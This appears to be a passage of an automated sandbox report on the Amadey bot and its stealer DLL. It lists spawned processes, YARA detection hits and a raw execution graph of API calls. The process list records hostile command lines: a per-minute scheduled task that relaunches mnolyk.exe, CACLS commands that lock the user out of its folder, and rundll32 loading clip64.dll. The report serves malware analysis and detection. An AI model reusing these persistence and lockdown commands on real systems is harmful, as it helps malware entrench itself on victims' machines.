                                                                      • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 81%, ReversingLabs
                                                                      Reputation:moderate

                                                                      Target ID:16
                                                                      Start time:23:06:58
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                                                                      Imagebase:0x180000
                                                                      File size:185856 bytes
                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Target ID:17
                                                                      Start time:23:06:58
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6edaf0000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:18
                                                                      Start time:23:06:58
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                                                                      Imagebase:0xa60000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:19
                                                                      Start time:23:06:58
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6edaf0000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:20
                                                                      Start time:23:06:58
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                      Imagebase:0xa60000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:21
                                                                      Start time:23:06:58
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\SysWOW64\cacls.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:CACLS "mnolyk.exe" /P "user:N"
                                                                      Imagebase:0xd20000
                                                                      File size:27648 bytes
                                                                      MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:22
                                                                      Start time:23:06:59
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\SysWOW64\cacls.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:CACLS "mnolyk.exe" /P "user:R" /E
                                                                      Imagebase:0xd20000
                                                                      File size:27648 bytes
                                                                      MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:23
                                                                      Start time:23:06:59
                                                                      Start date:07/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Imagebase:0x1b0000
                                                                      File size:241664 bytes
                                                                      MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000017.00000000.324372963.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000017.00000002.331572351.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                                                                      Target ID:24
                                                                      Start time:23:06:59
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                      Imagebase:0xa60000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:25
                                                                      Start time:23:07:00
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\SysWOW64\cacls.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:CACLS "..\4b9a106e76" /P "user:N"
                                                                      Imagebase:0xd20000
                                                                      File size:27648 bytes
                                                                      MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:26
                                                                      Start time:23:07:02
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                                                                      Imagebase:0x360000
                                                                      File size:61952 bytes
                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:27
                                                                      Start time:23:07:02
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\SysWOW64\cacls.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:CACLS "..\4b9a106e76" /P "user:R" /E
                                                                      Imagebase:0xd20000
                                                                      File size:27648 bytes
                                                                      MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:30
                                                                      Start time:23:08:00
                                                                      Start date:07/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Imagebase:0x1b0000
                                                                      File size:241664 bytes
                                                                      MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000001E.00000002.455495920.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000001E.00000000.454883478.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                                                                      Target ID:32
                                                                      Start time:23:09:00
                                                                      Start date:07/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Imagebase:0x1b0000
                                                                      File size:241664 bytes
                                                                      MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000020.00000000.583498615.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000020.00000002.583819503.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                                                                      Target ID:33
                                                                      Start time:23:10:00
                                                                      Start date:07/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Imagebase:0x1b0000
                                                                      File size:241664 bytes
                                                                      MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000021.00000002.712917292.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000021.00000000.712317333.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                                                                        Execution Graph

                                                                        Execution Coverage:26.9%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:29.5%
                                                                        Total number of Nodes:969
                                                                        Total number of Limit Nodes:43
2418->2414 2426 3d2407 2418->2426 2419 3d2479 2423 3d2488 SetFileAttributesA DeleteFileA 2419->2423 2420 3d2421 lstrcmpA 2421 3d24a9 FindNextFileA 2420->2421 2422 3d2431 lstrcmpA 2420->2422 2424 3d24bd FindClose RemoveDirectoryA 2421->2424 2421->2426 2422->2421 2422->2426 2423->2421 2424->2414 2425 3d658a CharPrevA 2425->2426 2426->2419 2426->2420 2426->2421 2426->2425 2427 3d2390 5 API calls 2426->2427 2427->2426 2433 3d3737 2428->2433 2435 3d372d 2428->2435 2429 3d44b9 20 API calls 2430 3d39fc 2429->2430 2431 3d6ce0 4 API calls 2430->2431 2432 3d2e92 2431->2432 2432->2244 2432->2268 2443 3d18a3 2432->2443 2433->2430 2433->2435 2436 3d38a4 2433->2436 2514 3d28e8 2433->2514 2435->2429 2435->2430 2436->2430 2436->2435 2437 3d39c1 MessageBeep 2436->2437 2438 3d681f 10 API calls 2437->2438 2439 3d39ce 2438->2439 2440 3d39d8 MessageBoxA 2439->2440 2441 3d67c9 EnumResourceLanguagesA 2439->2441 2440->2430 2441->2440 2444 3d19b8 2443->2444 2445 3d18d5 2443->2445 2447 3d6ce0 4 API calls 2444->2447 2543 3d17ee LoadLibraryA 2445->2543 2449 3d19d5 2447->2449 2449->2268 2463 3d6517 FindResourceA 2449->2463 2450 3d18e5 GetCurrentProcess OpenProcessToken 2450->2444 2451 3d1900 GetTokenInformation 2450->2451 2452 3d1918 GetLastError 2451->2452 2453 3d19aa CloseHandle 2451->2453 2452->2453 2454 3d1927 LocalAlloc 2452->2454 2453->2444 2455 3d19a9 2454->2455 2456 3d1938 GetTokenInformation 2454->2456 2455->2453 2457 3d194e AllocateAndInitializeSid 2456->2457 2458 3d19a2 LocalFree 2456->2458 2457->2458 2462 3d196e 2457->2462 2458->2455 2459 3d1999 FreeSid 2459->2458 2460 3d1975 EqualSid 2461 3d198c 2460->2461 2460->2462 2461->2459 2462->2459 2462->2460 2462->2461 2464 3d656b 2463->2464 2465 3d6536 LoadResource 2463->2465 2467 3d44b9 20 API calls 2464->2467 2465->2464 2466 3d6544 DialogBoxIndirectParamA FreeResource 2465->2466 2466->2464 2468 3d657c 2466->2468 2467->2468 2468->2268 2470->2357 2472 3d6857 GetVersionExA 2471->2472 2481 3d691a 2471->2481 2474 3d687c 2472->2474 2472->2481 
2473 3d6ce0 4 API calls 2475 3d452c 2473->2475 2476 3d68a5 GetSystemMetrics 2474->2476 2474->2481 2475->2367 2482 3d67c9 2475->2482 2477 3d68b5 RegOpenKeyExA 2476->2477 2476->2481 2478 3d68d6 RegQueryValueExA RegCloseKey 2477->2478 2477->2481 2479 3d690c 2478->2479 2478->2481 2492 3d66f9 2479->2492 2481->2473 2483 3d67e2 2482->2483 2487 3d6803 2482->2487 2496 3d6793 EnumResourceLanguagesA 2483->2496 2485 3d67f5 2485->2487 2497 3d6793 EnumResourceLanguagesA 2485->2497 2487->2367 2489 3d172d 2488->2489 2490 3d173d _vsnprintf 2489->2490 2491 3d175d 2489->2491 2490->2491 2491->2382 2493 3d670f 2492->2493 2494 3d6740 CharNextA 2493->2494 2495 3d674b 2493->2495 2494->2493 2495->2481 2496->2485 2497->2487 2499 3d66d5 2498->2499 2500 3d66f3 2499->2500 2502 3d66e5 CharNextA 2499->2502 2510 3d6648 2499->2510 2500->2392 2502->2499 2504 3d659b 2503->2504 2504->2504 2505 3d65b8 CharPrevA 2504->2505 2506 3d65ab 2504->2506 2505->2506 2506->2397 2513 3d6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2507->2513 2509 3d621d 2511 3d665d IsDBCSLeadByte 2510->2511 2512 3d6668 2510->2512 2511->2512 2512->2499 2513->2509 2515 3d2a62 2514->2515 2522 3d290d 2514->2522 2516 3d2a6e GlobalFree 2515->2516 2517 3d2a75 2515->2517 2516->2517 2517->2436 2519 3d2955 GlobalAlloc 2519->2515 2520 3d2968 GlobalLock 2519->2520 2520->2515 2520->2522 2521 3d2a20 GlobalUnlock 2521->2522 2522->2515 2522->2519 2522->2521 2523 3d2a80 GlobalUnlock 2522->2523 2524 3d2773 2522->2524 2523->2515 2525 3d27a3 CharUpperA CharNextA CharNextA 2524->2525 2526 3d28b2 2524->2526 2527 3d27db 2525->2527 2528 3d28b7 GetSystemDirectoryA 2525->2528 2526->2528 2529 3d28a8 GetWindowsDirectoryA 2527->2529 2530 3d27e3 2527->2530 2531 3d28bf 2528->2531 2529->2531 2535 3d658a CharPrevA 2530->2535 2532 3d28d2 2531->2532 2533 3d658a CharPrevA 2531->2533 2534 3d6ce0 4 API calls 2532->2534 2533->2532 2536 3d28e2 2534->2536 2537 3d2810 RegOpenKeyExA 2535->2537 2536->2522 2537->2531 2538 3d2837 
RegQueryValueExA 2537->2538 2539 3d285c 2538->2539 2540 3d289a RegCloseKey 2538->2540 2541 3d2867 ExpandEnvironmentStringsA 2539->2541 2542 3d287a 2539->2542 2540->2531 2541->2542 2542->2540 2544 3d1826 GetProcAddress 2543->2544 2545 3d1890 2543->2545 2547 3d1889 FreeLibrary 2544->2547 2548 3d1839 AllocateAndInitializeSid 2544->2548 2546 3d6ce0 4 API calls 2545->2546 2549 3d189f 2546->2549 2547->2545 2548->2547 2550 3d185f FreeSid 2548->2550 2549->2444 2549->2450 2550->2547 2553 3d468f 7 API calls 2552->2553 2554 3d51f9 LocalAlloc 2553->2554 2555 3d522d 2554->2555 2556 3d520d 2554->2556 2558 3d468f 7 API calls 2555->2558 2557 3d44b9 20 API calls 2556->2557 2559 3d521e 2557->2559 2560 3d523a 2558->2560 2561 3d6285 GetLastError 2559->2561 2562 3d523e 2560->2562 2563 3d5262 lstrcmpA 2560->2563 2571 3d5223 2561->2571 2564 3d44b9 20 API calls 2562->2564 2565 3d527e 2563->2565 2566 3d5272 LocalFree 2563->2566 2568 3d524f LocalFree 2564->2568 2567 3d44b9 20 API calls 2565->2567 2569 3d2f4d 2566->2569 2570 3d5290 LocalFree 2567->2570 2568->2569 2569->2278 2569->2280 2569->2287 2570->2571 2571->2569 2573 3d468f 7 API calls 2572->2573 2574 3d5175 2573->2574 2575 3d517a 2574->2575 2576 3d51af 2574->2576 2578 3d44b9 20 API calls 2575->2578 2577 3d468f 7 API calls 2576->2577 2579 3d51c0 2577->2579 2586 3d518d 2578->2586 2739 3d6298 2579->2739 2583 3d51ce 2585 3d44b9 20 API calls 2583->2585 2584 3d51e1 2584->2284 2585->2586 2586->2284 2588 3d468f 7 API calls 2587->2588 2589 3d55c7 LocalAlloc 2588->2589 2590 3d55fd 2589->2590 2591 3d55db 2589->2591 2592 3d468f 7 API calls 2590->2592 2593 3d44b9 20 API calls 2591->2593 2594 3d560a 2592->2594 2595 3d55ec 2593->2595 2596 3d560e 2594->2596 2597 3d5632 lstrcmpA 2594->2597 2598 3d6285 GetLastError 2595->2598 2599 3d44b9 20 API calls 2596->2599 2600 3d564b LocalFree 2597->2600 2601 3d5645 2597->2601 2620 3d55f1 2598->2620 2602 3d561f LocalFree 2599->2602 2603 3d565b 2600->2603 2604 3d5696 2600->2604 2601->2600 2625 3d55f6 2602->2625 
2612 3d5467 49 API calls 2603->2612 2605 3d589f 2604->2605 2607 3d56ae GetTempPathA 2604->2607 2608 3d6517 24 API calls 2605->2608 2606 3d6ce0 4 API calls 2609 3d2f7e 2606->2609 2610 3d56eb 2607->2610 2611 3d56c3 2607->2611 2608->2625 2609->2287 2609->2291 2618 3d586c GetWindowsDirectoryA 2610->2618 2619 3d5717 GetDriveTypeA 2610->2619 2610->2625 2751 3d5467 2611->2751 2614 3d5678 2612->2614 2616 3d5680 2614->2616 2614->2625 2617 3d44b9 20 API calls 2616->2617 2617->2620 2785 3d597d GetCurrentDirectoryA SetCurrentDirectoryA 2618->2785 2621 3d5730 GetFileAttributesA 2619->2621 2635 3d572b 2619->2635 2620->2625 2621->2635 2625->2606 2626 3d5467 49 API calls 2626->2610 2627 3d2630 21 API calls 2627->2635 2629 3d57c1 GetWindowsDirectoryA 2629->2635 2630 3d597d 34 API calls 2630->2635 2631 3d658a CharPrevA 2632 3d57e8 GetFileAttributesA 2631->2632 2633 3d57fa CreateDirectoryA 2632->2633 2632->2635 2633->2635 2634 3d5827 SetFileAttributesA 2634->2635 2635->2618 2635->2619 2635->2621 2635->2625 2635->2627 2635->2629 2635->2630 2635->2631 2635->2634 2636 3d5467 49 API calls 2635->2636 2781 3d6952 2635->2781 2636->2635 2638 3d6249 2637->2638 2639 3d6268 2637->2639 2641 3d44b9 20 API calls 2638->2641 2640 3d597d 34 API calls 2639->2640 2642 3d6277 2640->2642 2643 3d625a 2641->2643 2644 3d6ce0 4 API calls 2642->2644 2645 3d6285 GetLastError 2643->2645 2647 3d3013 2644->2647 2646 3d625f 2645->2646 2646->2642 2647->2287 2647->2298 2649 3d3b2d 2648->2649 2649->2649 2650 3d3b72 2649->2650 2651 3d3b53 2649->2651 2852 3d4fe0 2650->2852 2653 3d6517 24 API calls 2651->2653 2654 3d3b70 2653->2654 2655 3d6298 10 API calls 2654->2655 2656 3d3b7b 2654->2656 2655->2656 2656->2304 2658 3d2583 2657->2658 2659 3d2622 2657->2659 2660 3d25e8 RegOpenKeyExA 2658->2660 2661 3d258b 2658->2661 2906 3d24e0 GetWindowsDirectoryA 2659->2906 2663 3d2609 RegQueryInfoKeyA 2660->2663 2664 3d25e3 2660->2664 2661->2664 2665 3d259b RegOpenKeyExA 2661->2665 2666 3d25d1 RegCloseKey 2663->2666 2664->2309 
2665->2664 2667 3d25bc RegQueryValueExA 2665->2667 2666->2664 2667->2666 2669 3d3bec 2668->2669 2670 3d3bdb 2668->2670 2672 3d3c03 memset 2669->2672 2673 3d3d13 2669->2673 2678 3d3d7b CompareStringA 2669->2678 2679 3d3f4d 2669->2679 2680 3d3fd7 2669->2680 2681 3d3fab 2669->2681 2685 3d3f1e LocalFree 2669->2685 2686 3d3f46 LocalFree 2669->2686 2689 3d468f 7 API calls 2669->2689 2691 3d3cc7 CompareStringA 2669->2691 2702 3d3e10 2669->2702 2914 3d1ae8 2669->2914 2954 3d202a memset memset RegCreateKeyExA 2669->2954 2980 3d3fef 2669->2980 2671 3d468f 7 API calls 2670->2671 2671->2669 2672->2669 2674 3d44b9 20 API calls 2673->2674 2701 3d3d26 2674->2701 2676 3d6ce0 4 API calls 2677 3d3f60 2676->2677 2677->2314 2678->2669 2678->2680 2679->2676 2680->2679 3004 3d2267 2680->3004 2684 3d44b9 20 API calls 2681->2684 2688 3d3fbe LocalFree 2684->2688 2685->2669 2685->2680 2686->2679 2688->2679 2689->2669 2691->2669 2692 3d3e1f GetProcAddress 2694 3d3f64 2692->2694 2692->2702 2693 3d3f92 2695 3d44b9 20 API calls 2693->2695 2697 3d44b9 20 API calls 2694->2697 2696 3d3fa9 2695->2696 2698 3d3f7c LocalFree 2696->2698 2699 3d3f75 FreeLibrary 2697->2699 2700 3d6285 GetLastError 2698->2700 2699->2698 2700->2701 2701->2679 2702->2692 2702->2693 2703 3d3eff FreeLibrary 2702->2703 2704 3d3f40 FreeLibrary 2702->2704 2994 3d6495 2702->2994 2703->2685 2704->2686 2706 3d468f 7 API calls 2705->2706 2707 3d3a55 LocalAlloc 2706->2707 2708 3d3a6c 2707->2708 2709 3d3a8e 2707->2709 2710 3d44b9 20 API calls 2708->2710 2711 3d468f 7 API calls 2709->2711 2712 3d3a7d 2710->2712 2713 3d3a98 2711->2713 2714 3d6285 GetLastError 2712->2714 2715 3d3a9c 2713->2715 2716 3d3ac5 lstrcmpA 2713->2716 2717 3d2f64 2714->2717 2718 3d44b9 20 API calls 2715->2718 2719 3d3b0d LocalFree 2716->2719 2720 3d3ada 2716->2720 2717->2278 2717->2287 2722 3d3aad LocalFree 2718->2722 2719->2717 2721 3d6517 24 API calls 2720->2721 2723 3d3aec LocalFree 2721->2723 2722->2717 2723->2717 2725 3d303c 2724->2725 2725->2287 2727 3d468f 
7 API calls 2726->2727 2728 3d417d LocalAlloc 2727->2728 2729 3d41a8 2728->2729 2730 3d4195 2728->2730 2731 3d468f 7 API calls 2729->2731 2732 3d44b9 20 API calls 2730->2732 2733 3d41b5 2731->2733 2734 3d41a6 2732->2734 2735 3d41b9 2733->2735 2736 3d41c5 lstrcmpA 2733->2736 2734->2287 2738 3d44b9 20 API calls 2735->2738 2736->2735 2737 3d41e6 LocalFree 2736->2737 2737->2734 2738->2737 2740 3d171e _vsnprintf 2739->2740 2741 3d62c9 FindResourceA 2740->2741 2743 3d62cb LoadResource LockResource 2741->2743 2744 3d6353 2741->2744 2743->2744 2747 3d62e0 2743->2747 2745 3d6ce0 4 API calls 2744->2745 2746 3d51ca 2745->2746 2746->2583 2746->2584 2748 3d631b FreeResource 2747->2748 2749 3d6355 FreeResource 2747->2749 2750 3d171e _vsnprintf 2748->2750 2749->2744 2750->2741 2752 3d548a 2751->2752 2769 3d551a 2751->2769 2812 3d53a1 2752->2812 2754 3d5581 2758 3d6ce0 4 API calls 2754->2758 2757 3d5495 2757->2754 2761 3d550c 2757->2761 2762 3d54c2 GetSystemInfo 2757->2762 2763 3d559a 2758->2763 2759 3d554d 2759->2754 2766 3d597d 34 API calls 2759->2766 2760 3d553b CreateDirectoryA 2764 3d5577 2760->2764 2765 3d5547 2760->2765 2767 3d658a CharPrevA 2761->2767 2771 3d54da 2762->2771 2763->2625 2775 3d2630 GetWindowsDirectoryA 2763->2775 2768 3d6285 GetLastError 2764->2768 2765->2759 2772 3d555c 2766->2772 2767->2769 2770 3d557c 2768->2770 2823 3d58c8 2769->2823 2770->2754 2771->2761 2773 3d658a CharPrevA 2771->2773 2772->2754 2774 3d5568 RemoveDirectoryA 2772->2774 2773->2761 2774->2754 2776 3d266f 2775->2776 2777 3d265e 2775->2777 2779 3d6ce0 4 API calls 2776->2779 2778 3d44b9 20 API calls 2777->2778 2778->2776 2780 3d2687 2779->2780 2780->2610 2780->2626 2782 3d696e GetDiskFreeSpaceA 2781->2782 2783 3d69a1 2781->2783 2782->2783 2784 3d6989 MulDiv 2782->2784 2783->2635 2784->2783 2786 3d59dd GetDiskFreeSpaceA 2785->2786 2787 3d59bb 2785->2787 2789 3d5ba1 memset 2786->2789 2790 3d5a21 MulDiv 2786->2790 2788 3d44b9 20 API calls 2787->2788 2791 3d59cc 2788->2791 2792 3d6285 
GetLastError 2789->2792 2790->2789 2793 3d5a50 GetVolumeInformationA 2790->2793 2794 3d6285 GetLastError 2791->2794 2795 3d5bbc GetLastError FormatMessageA 2792->2795 2796 3d5a6e memset 2793->2796 2797 3d5ab5 SetCurrentDirectoryA 2793->2797 2798 3d59d1 2794->2798 2799 3d5be3 2795->2799 2800 3d6285 GetLastError 2796->2800 2806 3d5acc 2797->2806 2810 3d5b94 2798->2810 2801 3d44b9 20 API calls 2799->2801 2802 3d5a89 GetLastError FormatMessageA 2800->2802 2804 3d5bf5 SetCurrentDirectoryA 2801->2804 2802->2799 2803 3d6ce0 4 API calls 2805 3d5c11 2803->2805 2804->2810 2805->2610 2807 3d5b0a 2806->2807 2809 3d5b20 2806->2809 2808 3d44b9 20 API calls 2807->2808 2808->2798 2809->2810 2835 3d268b 2809->2835 2810->2803 2814 3d53bf 2812->2814 2813 3d171e _vsnprintf 2813->2814 2814->2813 2815 3d658a CharPrevA 2814->2815 2819 3d5415 GetTempFileNameA 2814->2819 2816 3d53fa RemoveDirectoryA GetFileAttributesA 2815->2816 2816->2814 2817 3d544f CreateDirectoryA 2816->2817 2818 3d543a 2817->2818 2817->2819 2821 3d6ce0 4 API calls 2818->2821 2819->2818 2820 3d5429 DeleteFileA CreateDirectoryA 2819->2820 2820->2818 2822 3d5449 2821->2822 2822->2757 2824 3d58d8 2823->2824 2824->2824 2825 3d58df LocalAlloc 2824->2825 2826 3d5919 2825->2826 2827 3d58f3 2825->2827 2829 3d658a CharPrevA 2826->2829 2828 3d44b9 20 API calls 2827->2828 2833 3d5906 2828->2833 2831 3d5931 CreateFileA LocalFree 2829->2831 2830 3d6285 GetLastError 2834 3d5534 2830->2834 2832 3d595b CloseHandle GetFileAttributesA 2831->2832 2831->2833 2832->2833 2833->2830 2833->2834 2834->2759 2834->2760 2836 3d26b9 2835->2836 2837 3d26e5 2835->2837 2838 3d171e _vsnprintf 2836->2838 2839 3d271f 2837->2839 2840 3d26ea 2837->2840 2842 3d26cc 2838->2842 2841 3d26e3 2839->2841 2844 3d171e _vsnprintf 2839->2844 2843 3d171e _vsnprintf 2840->2843 2845 3d6ce0 4 API calls 2841->2845 2846 3d44b9 20 API calls 2842->2846 2847 3d26fd 2843->2847 2848 3d2735 2844->2848 2849 3d276d 2845->2849 2846->2841 2850 3d44b9 20 API calls 2847->2850 2851 
3d44b9 20 API calls 2848->2851 2849->2810 2850->2841 2851->2841 2853 3d468f 7 API calls 2852->2853 2854 3d4ff5 FindResourceA LoadResource LockResource 2853->2854 2855 3d5020 2854->2855 2870 3d515f 2854->2870 2856 3d5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2855->2856 2857 3d5057 2855->2857 2856->2857 2874 3d4efd 2857->2874 2860 3d507c 2864 3d50e8 2860->2864 2868 3d5106 2860->2868 2861 3d5060 2862 3d44b9 20 API calls 2861->2862 2863 3d5075 2862->2863 2863->2868 2865 3d44b9 20 API calls 2864->2865 2865->2863 2866 3d511d 2869 3d5129 2866->2869 2871 3d513a 2866->2871 2867 3d5110 FreeResource 2867->2866 2868->2866 2868->2867 2872 3d44b9 20 API calls 2869->2872 2870->2654 2871->2870 2873 3d514c SendMessageA 2871->2873 2872->2871 2873->2870 2875 3d4f4a 2874->2875 2881 3d4fa1 2875->2881 2882 3d4980 2875->2882 2877 3d6ce0 4 API calls 2879 3d4fc6 2877->2879 2879->2860 2879->2861 2881->2877 2883 3d4990 2882->2883 2884 3d49a5 2883->2884 2885 3d49c2 lstrcmpA 2883->2885 2886 3d44b9 20 API calls 2884->2886 2887 3d4a0e 2885->2887 2888 3d49ba 2885->2888 2886->2888 2887->2888 2893 3d487a 2887->2893 2888->2881 2890 3d4b60 2888->2890 2891 3d4b76 2890->2891 2892 3d4b92 FindCloseChangeNotification 2890->2892 2891->2881 2892->2891 2894 3d48a2 CreateFileA 2893->2894 2896 3d48e9 2894->2896 2897 3d4908 2894->2897 2896->2897 2898 3d48ee 2896->2898 2897->2888 2901 3d490c 2898->2901 2902 3d48f5 CreateFileA 2901->2902 2903 3d4917 2901->2903 2902->2897 2903->2902 2904 3d4962 CharNextA 2903->2904 2905 3d4953 CreateDirectoryA 2903->2905 2904->2903 2905->2904 2907 3d255b 2906->2907 2908 3d2510 2906->2908 2909 3d6ce0 4 API calls 2907->2909 2910 3d658a CharPrevA 2908->2910 2912 3d2569 2909->2912 2911 3d2522 WritePrivateProfileStringA _lopen 2910->2911 2911->2907 2913 3d2548 _llseek _lclose 2911->2913 2912->2664 2913->2907 2915 3d1b25 2914->2915 3018 3d1a84 2915->3018 2917 3d1b57 2918 3d658a CharPrevA 2917->2918 2919 3d1b8c 2917->2919 2918->2919 2920 3d66c8 2 API calls 2919->2920 2921 3d1bd1 
